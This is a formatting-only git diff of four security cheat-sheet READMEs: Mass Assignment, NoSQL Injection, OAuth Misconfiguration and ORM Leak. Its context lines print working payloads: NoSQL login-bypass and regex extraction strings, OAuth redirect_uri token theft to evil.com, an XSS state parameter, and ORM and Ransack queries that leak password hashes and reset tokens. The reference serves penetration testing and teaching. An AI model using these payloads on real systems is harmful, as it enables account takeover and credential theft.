swisskyrepo
diff --git a/‎Mass Assignment/README.md
Lines changed: 3 additions & 6 deletions b/‎Mass Assignment/README.md
Lines changed: 3 additions & 6 deletions
diff --git a/‎NoSQL Injection/README.md
Lines changed: 11 additions & 14 deletions b/‎NoSQL Injection/README.md
Lines changed: 11 additions & 14 deletions
diff --git a/‎OAuth Misconfiguration/README.md
Lines changed: 11 additions & 20 deletions b/‎OAuth Misconfiguration/README.md
Lines changed: 11 additions & 20 deletions
diff --git a/‎ORM Leak/README.md
Lines changed: 13 additions & 23 deletions b/‎ORM Leak/README.md
Lines changed: 13 additions & 23 deletions
@@ -8,7 +8,6 @@
 * [Labs](#labs)
 * [References](#references)
 
-
 ## Methodology
 
 Mass assignment vulnerabilities are most common in web applications that use Object-Relational Mapping (ORM) techniques or functions to map user input to object properties, where properties can be updated all at once instead of individually. Many popular web development frameworks such as Ruby on Rails, Django, and Laravel (PHP) offer this functionality.
@@ -28,16 +27,14 @@ However, an attacker may attempt to add an `isAdmin` parameter to the incoming d
 
 If the web application is not checking which parameters are allowed to be updated in this way, it might set the `isAdmin` attribute based on the user-supplied input, giving the attacker admin privileges
 
-
 ## Labs
 
 * [PentesterAcademy - Mass Assignment I](https://attackdefense.pentesteracademy.com/challengedetailsnoauth?cid=1964)
 * [PentesterAcademy - Mass Assignment II](https://attackdefense.pentesteracademy.com/challengedetailsnoauth?cid=1922)
 * [Root Me - API - Mass Assignment](https://www.root-me.org/en/Challenges/Web-Server/API-Mass-Assignment)
 
-
 ## References
 
-- [Hunting for Mass Assignment - Shivam Bathla - August 12, 2021](https://blog.pentesteracademy.com/hunting-for-mass-assignment-56ed73095eda)
-- [Mass Assignment Cheat Sheet - OWASP - March 15, 2021](https://cheatsheetseries.owasp.org/cheatsheets/Mass_Assignment_Cheat_Sheet.html)
-- [What is Mass Assignment? Attacks and Security Tips - Yoan MONTOYA - June 15, 2023](https://www.vaadata.com/blog/what-is-mass-assignment-attacks-and-security-tips/)
+* [Hunting for Mass Assignment - Shivam Bathla - August 12, 2021](https://blog.pentesteracademy.com/hunting-for-mass-assignment-56ed73095eda)
+* [Mass Assignment Cheat Sheet - OWASP - March 15, 2021](https://cheatsheetseries.owasp.org/cheatsheets/Mass_Assignment_Cheat_Sheet.html)
+* [What is Mass Assignment? Attacks and Security Tips - Yoan MONTOYA - June 15, 2023](https://www.vaadata.com/blog/what-is-mass-assignment-attacks-and-security-tips/)
@@ -2,7 +2,6 @@
 
 > NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax.
 
-
 ## Summary
 
 * [Tools](#tools)
@@ -17,13 +16,11 @@
 * [Labs](#references)
 * [References](#references)
 
-
 ## Tools
 
 * [codingo/NoSQLmap](https://github.com/codingo/NoSQLMap) - Automated NoSQL database enumeration and web application exploitation tool
 * [digininja/nosqlilab](https://github.com/digininja/nosqlilab) - A lab for playing with NoSQL Injection
-* [matrix/Burp-NoSQLiScanner](https://github.com/matrix/Burp-NoSQLiScanner) - This extension provides a way to discover NoSQL injection vulnerabilities. 
-
+* [matrix/Burp-NoSQLiScanner](https://github.com/matrix/Burp-NoSQLiScanner) - This extension provides a way to discover NoSQL injection vulnerabilities.
 
 ## Methodology
 
@@ -32,6 +29,7 @@
 Basic authentication bypass using not equal (`$ne`) or greater (`$gt`)
 
 * in HTTP data
+
   ```ps1
   username[$ne]=toto&password[$ne]=toto
   login[$regex]=a.*&pass[$ne]=lol
@@ -40,14 +38,14 @@ Basic authentication bypass using not equal (`$ne`) or greater (`$gt`)
   ```
 
 * in JSON data
+
   ```json
   {"username": {"$ne": null}, "password": {"$ne": null}}
   {"username": {"$ne": "foo"}, "password": {"$ne": "bar"}}
   {"username": {"$gt": undefined}, "password": {"$gt": undefined}}
   {"username": {"$gt":""}, "password": {"$gt":""}}
   ```
 
-
 ### Extract Length Information
 
 Inject a payload using the $regex operator. The injection will work when the length is correct.
@@ -62,6 +60,7 @@ username[$ne]=toto&password[$regex]=.{3}
 Extract data with "`$regex`" query operator.
 
 * HTTP data
+
   ```ps1
   username[$ne]=toto&password[$regex]=m.{2}
   username[$ne]=toto&password[$regex]=md.{1}
@@ -72,6 +71,7 @@ Extract data with "`$regex`" query operator.
   ```
 
 * JSON data
+
   ```json
   {"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}
   {"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}
@@ -84,7 +84,6 @@ Extract data with "`$in`" query operator.
 {"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
 ```
 
-
 ## Blind NoSQL
 
 ### POST with JSON Body
@@ -191,18 +190,16 @@ while true
 end
 ```
 
-
 ## Labs
 
 * [Root Me - NoSQL injection - Authentication](https://www.root-me.org/en/Challenges/Web-Server/NoSQL-injection-Authentication)
 * [Root Me - NoSQL injection - Blind](https://www.root-me.org/en/Challenges/Web-Server/NoSQL-injection-Blind)
 
-
 ## References
 
-- [Burp-NoSQLiScanner - matrix - January 30, 2021](https://github.com/matrix/Burp-NoSQLiScanner/blob/main/src/burp/BurpExtender.java)
-- [Les NOSQL injections Classique et Blind: Never trust user input - Geluchat - February 22, 2015](https://www.dailysecurity.fr/nosql-injections-classique-blind/)
-- [MongoDB NoSQL Injection with Aggregation Pipelines - Soroush Dalili (@irsdl) - June 23, 2024](https://soroush.me/blog/2024/06/mongodb-nosql-injection-with-aggregation-pipelines/)
-- [NoSQL Injection in MongoDB - Zanon - July 17, 2016](https://zanon.io/posts/nosql-injection-in-mongodb)
-- [NoSQL injection wordlists - cr0hn - May 5, 2021](https://github.com/cr0hn/nosqlinjection_wordlists)
-- [Testing for NoSQL injection - OWASP - May 2, 2023](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection)
+* [Burp-NoSQLiScanner - matrix - January 30, 2021](https://github.com/matrix/Burp-NoSQLiScanner/blob/main/src/burp/BurpExtender.java)
+* [Les NOSQL injections Classique et Blind: Never trust user input - Geluchat - February 22, 2015](https://www.dailysecurity.fr/nosql-injections-classique-blind/)
+* [MongoDB NoSQL Injection with Aggregation Pipelines - Soroush Dalili (@irsdl) - June 23, 2024](https://soroush.me/blog/2024/06/mongodb-nosql-injection-with-aggregation-pipelines/)
+* [NoSQL Injection in MongoDB - Zanon - July 17, 2016](https://zanon.io/posts/nosql-injection-in-mongodb)
+* [NoSQL injection wordlists - cr0hn - May 5, 2021](https://github.com/cr0hn/nosqlinjection_wordlists)
+* [Testing for NoSQL injection - OWASP - May 2, 2023](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection)
@@ -1,25 +1,22 @@
 # OAuth Misconfiguration
 
-> OAuth is a widely-used authorization framework that allows third-party applications to access user data without exposing user credentials. However, improper configuration and implementation of OAuth can lead to severe security vulnerabilities. This document explores common OAuth misconfigurations, potential attack vectors, and best practices for mitigating these risks. 
-
+> OAuth is a widely-used authorization framework that allows third-party applications to access user data without exposing user credentials. However, improper configuration and implementation of OAuth can lead to severe security vulnerabilities. This document explores common OAuth misconfigurations, potential attack vectors, and best practices for mitigating these risks.
 
 ## Summary
 
 - [Stealing OAuth Token via referer](#stealing-oauth-token-via-referer)
-- [Grabbing OAuth Token via redirect_uri](#grabbing-oauth-token-via-redirect---uri)
-- [Executing XSS via redirect_uri](#executing-xss-via-redirect---uri)
+- [Grabbing OAuth Token via redirect_uri](#grabbing-oauth-token-via-redirect_uri)
+- [Executing XSS via redirect_uri](#executing-xss-via-redirect_uri)
 - [OAuth Private Key Disclosure](#oauth-private-key-disclosure)
 - [Authorization Code Rule Violation](#authorization-code-rule-violation)
 - [Cross-Site Request Forgery](#cross-site-request-forgery)
 - [Labs](#labs)
 - [References](#references)
 
-
 ## Stealing OAuth Token via referer
 
 > Do you have HTML injection but can't get XSS? Are there any OAuth implementations on the site? If so, setup an img tag to your server and see if there's a way to get the victim there (redirect, etc.) after login to steal OAuth tokens via referer - [@abugzlife1](https://twitter.com/abugzlife1/status/1125663944272748544)
 
-
 ## Grabbing OAuth Token via redirect_uri
 
 Redirect to a controlled domain to get the access token
@@ -44,47 +41,41 @@ Sometimes you need to change the scope to an invalid one to bypass a filter on r
 https://www.example.com/admin/oauth/authorize?[...]&scope=a&redirect_uri=https://evil.com
 ```
 
-
 ## Executing XSS via redirect_uri
 
 ```powershell
 https://example.com/oauth/v1/authorize?[...]&redirect_uri=data%3Atext%2Fhtml%2Ca&state=<script>alert('XSS')</script>
 ```
 
-
 ## OAuth Private Key Disclosure
 
 Some Android/iOS app can be decompiled and the OAuth Private key can be accessed.
 
-
 ## Authorization Code Rule Violation
 
 > The client MUST NOT use the authorization code  more than once.  
 
-If an authorization code is used more than once, the authorization server MUST deny the request 
+If an authorization code is used more than once, the authorization server MUST deny the request
 and SHOULD revoke (when possible) all tokens previously issued based on that authorization code.
 
-
 ## Cross-Site Request Forgery
 
 Applications that do not check for a valid CSRF token in the OAuth callback are vulnerable. This can be exploited by initializing the OAuth flow and intercepting the callback (`https://example.com/callback?code=AUTHORIZATION_CODE`). This URL can be used in CSRF attacks.
 
 > The client MUST implement CSRF protection for its redirection URI. This is typically accomplished by requiring any request sent to the redirection URI endpoint to include a value that binds the request to the user-agent's authenticated state. The client SHOULD utilize the "state" request parameter to deliver this value to the authorization server when making an authorization request.
 
-
 ## Labs
 
-* [PortSwigger - Authentication bypass via OAuth implicit flow](https://portswigger.net/web-security/oauth/lab-oauth-authentication-bypass-via-oauth-implicit-flow)
-* [PortSwigger - Forced OAuth profile linking](https://portswigger.net/web-security/oauth/lab-oauth-forced-oauth-profile-linking)
-* [PortSwigger - OAuth account hijacking via redirect_uri](https://portswigger.net/web-security/oauth/lab-oauth-account-hijacking-via-redirect-uri)
-* [PortSwigger - Stealing OAuth access tokens via a proxy page](https://portswigger.net/web-security/oauth/lab-oauth-stealing-oauth-access-tokens-via-a-proxy-page)
-* [PortSwigger - Stealing OAuth access tokens via an open redirect](https://portswigger.net/web-security/oauth/lab-oauth-stealing-oauth-access-tokens-via-an-open-redirect)
-
+- [PortSwigger - Authentication bypass via OAuth implicit flow](https://portswigger.net/web-security/oauth/lab-oauth-authentication-bypass-via-oauth-implicit-flow)
+- [PortSwigger - Forced OAuth profile linking](https://portswigger.net/web-security/oauth/lab-oauth-forced-oauth-profile-linking)
+- [PortSwigger - OAuth account hijacking via redirect_uri](https://portswigger.net/web-security/oauth/lab-oauth-account-hijacking-via-redirect-uri)
+- [PortSwigger - Stealing OAuth access tokens via a proxy page](https://portswigger.net/web-security/oauth/lab-oauth-stealing-oauth-access-tokens-via-a-proxy-page)
+- [PortSwigger - Stealing OAuth access tokens via an open redirect](https://portswigger.net/web-security/oauth/lab-oauth-stealing-oauth-access-tokens-via-an-open-redirect)
 
 ## References
 
-- [All your Paypal OAuth tokens belong to me - asanso - November 28, 2016](http://blog.intothesymmetry.com/2016/11/all-your-paypal-tokens-belong-to-me.html) 
+- [All your Paypal OAuth tokens belong to me - asanso - November 28, 2016](http://blog.intothesymmetry.com/2016/11/all-your-paypal-tokens-belong-to-me.html)
 - [OAuth 2 - How I have hacked Facebook again (..and would have stolen a valid access token) - asanso - April 8, 2014](http://intothesymmetry.blogspot.ch/2014/04/oauth-2-how-i-have-hacked-facebook.html)
 - [How I hacked Github again - Egor Homakov - February 7, 2014](http://homakov.blogspot.ch/2014/02/how-i-hacked-github-again.html)
 - [How Microsoft is giving your data to Facebook… and everyone else - Andris Atteka - September 16, 2014](http://andrisatteka.blogspot.ch/2014/09/how-microsoft-is-giving-your-data-to.html)
-- [Bypassing Google Authentication on Periscope's Administration Panel - Jack Whitton - July 20, 2015](https://whitton.io/articles/bypassing-google-authentication-on-periscopes-admin-panel/)
+- [Bypassing Google Authentication on Periscope's Administration Panel - Jack Whitton - July 20, 2015](https://whitton.io/articles/bypassing-google-authentication-on-periscopes-admin-panel/)
@@ -2,7 +2,6 @@
 
 > An ORM leak vulnerability occurs when sensitive information, such as database structure or user data, is unintentionally exposed due to improper handling of ORM queries. This can happen if the application returns raw error messages, debug information, or allows attackers to manipulate queries in ways that reveal underlying data.
 
-
 ## Summary
 
 * [Django (Python)](#django-python)
@@ -19,7 +18,6 @@
 * [CVE](#cve)
 * [References](#references)
 
-
 ## Django (Python)
 
 The following code is a basic example of an ORM querying the database.
@@ -31,13 +29,11 @@ serializer = UserSerializer(users, many=True)
 
 The problem lies in how the Django ORM uses keyword parameter syntax to build QuerySets. By utilizing the unpack operator (`**`), users can dynamically control the keyword arguments passed to the filter method, allowing them to filter results according to their needs.
 
-
 ### Query filter
 
-The attacker can control the column to filter results by. 
+The attacker can control the column to filter results by.
 The ORM provides operators for matching parts of a value. These operators can utilize the SQL LIKE condition in generated queries, perform regex matching based on user-controlled patterns, or apply comparison operators such as < and >.
 
-
 ```json
 {
     "username": "admin",
@@ -51,18 +47,16 @@ Interesting filter to use:
 * `__contains`
 * `__regex`
 
-
 ### Relational Filtering
 
 Let's use this great example from [PLORMBING YOUR DJANGO ORM, by Alex Brown](https://www.elttam.com/blog/plormbing-your-django-orm/)
-![](https://www.elttam.com/assets/images/blog/2024-06-24-plormbing-your-django-orm/UML-example-app-simplified-highlight1.png)
+![UML-example-app-simplified-highlight](https://www.elttam.com/assets/images/blog/2024-06-24-plormbing-your-django-orm/UML-example-app-simplified-highlight1.png)
 
 We can see 2 type of relationships:
 
 * One-to-One relationships
 * Many-to-Many Relationships
 
-
 #### One-to-One
 
 Filtering through user that created an article, and having a password containing the character `p`.
@@ -73,13 +67,12 @@ Filtering through user that created an article, and having a password containing
 }
 ```
 
-
 #### Many-to-Many
 
 Almost the same thing but you need to filter more.
 
 * Get the user IDS: `created_by__departments__employees__user__id`
-* For each ID, get the username: `created_by__departments__employees__user__username` 
+* For each ID, get the username: `created_by__departments__employees__user__username`
 * Finally, leak their password hash: `created_by__departments__employees__user__password`
 
 Use multiple filters in the same request:
@@ -91,7 +84,6 @@ Use multiple filters in the same request:
 }
 ```
 
-
 ### Error-based leaking - ReDOS
 
 If Django use MySQL, you can also abuse a ReDOS to force an error when the filter does not properly match the condition.
@@ -104,12 +96,12 @@ If Django use MySQL, you can also abuse a ReDOS to force an error when the filte
 // => Error 500 (Timeout exceeded in regular expression match)
 ```
 
-
 ## Prisma (Node.JS)
 
 **Tools**:
 
 * [elttam/plormber](https://github.com/elttam/plormber) - tool for exploiting ORM Leak time-based vulnerabilities
+
     ```ps1
     plormber prisma-contains \
         --chars '0123456789abcdef' \
@@ -158,7 +150,6 @@ Select only one field
 }
 ```
 
-
 ### Relational Filtering
 
 #### One-to-One
@@ -203,14 +194,14 @@ Select only one field
 }
 ```
 
-
 ## Ransack (Ruby)
 
 Only in Ransack < `4.0.0`.
 
-![](https://assets-global.website-files.com/5f6498c074436c349716e747/63ceda8f7b5b98d68365bdee_ransack_bruteforce_overview-p-1600.png)
+![ransack_bruteforce_overview](https://assets-global.website-files.com/5f6498c074436c349716e747/63ceda8f7b5b98d68365bdee_ransack_bruteforce_overview-p-1600.png)
 
 * Extracting the `reset_password_token` field of a user
+
     ```ps1
     GET /posts?q[user_reset_password_token_start]=0 -> Empty results page
     GET /posts?q[user_reset_password_token_start]=1 -> Empty results page
@@ -221,23 +212,22 @@ Only in Ransack < `4.0.0`.
     ```
 
 * Target a specific user and extract his `recoveries_key`
+
     ```ps1
     GET /labs?q[creator_roles_name_cont]=superadmin&q[creator_recoveries_key_start]=0
     ```
 
-
 ## CVE
 
 * [CVE-2023-47117: Label Studio ORM Leak](https://github.com/HumanSignal/label-studio/security/advisories/GHSA-6hjj-gq77-j4qw)
 * [CVE-2023-31133: Ghost CMS ORM Leak](https://github.com/TryGhost/Ghost/security/advisories/GHSA-r97q-ghch-82j9)
 * [CVE-2023-30843: Payload CMS ORM Leak](https://github.com/payloadcms/payload/security/advisories/GHSA-35jj-vqcf-f2jf)
 
-
 ## References
 
-- [ORM Injection - HackTricks - July 30, 2024](https://book.hacktricks.xyz/pentesting-web/orm-injection)
-- [ORM Leak Exploitation Against SQLite - Louis Nyffenegger - July 30, 2024](https://pentesterlab.com/blog/orm-leak-with-sqlite3)
-- [plORMbing your Django ORM - Alex Brown - June 24, 2024](https://www.elttam.com/blog/plormbing-your-django-orm/)
-- [plORMbing your Prisma ORM with Time-based Attacks - Alex Brown - July 9, 2024](https://www.elttam.com/blog/plorming-your-primsa-orm/)
-- [QuerySet API reference - Django - August 8, 2024](https://docs.djangoproject.com/en/5.1/ref/models/querysets/)
-- [Ransacking your password reset tokens - Lukas Euler - January 26, 2023](https://positive.security/blog/ransack-data-exfiltration)
+* [ORM Injection - HackTricks - July 30, 2024](https://book.hacktricks.xyz/pentesting-web/orm-injection)
+* [ORM Leak Exploitation Against SQLite - Louis Nyffenegger - July 30, 2024](https://pentesterlab.com/blog/orm-leak-with-sqlite3)
+* [plORMbing your Django ORM - Alex Brown - June 24, 2024](https://www.elttam.com/blog/plormbing-your-django-orm/)
+* [plORMbing your Prisma ORM with Time-based Attacks - Alex Brown - July 9, 2024](https://www.elttam.com/blog/plorming-your-primsa-orm/)
+* [QuerySet API reference - Django - August 8, 2024](https://docs.djangoproject.com/en/5.1/ref/models/querysets/)
+* [Ransacking your password reset tokens - Lukas Euler - January 26, 2023](https://positive.security/blog/ransack-data-exfiltration)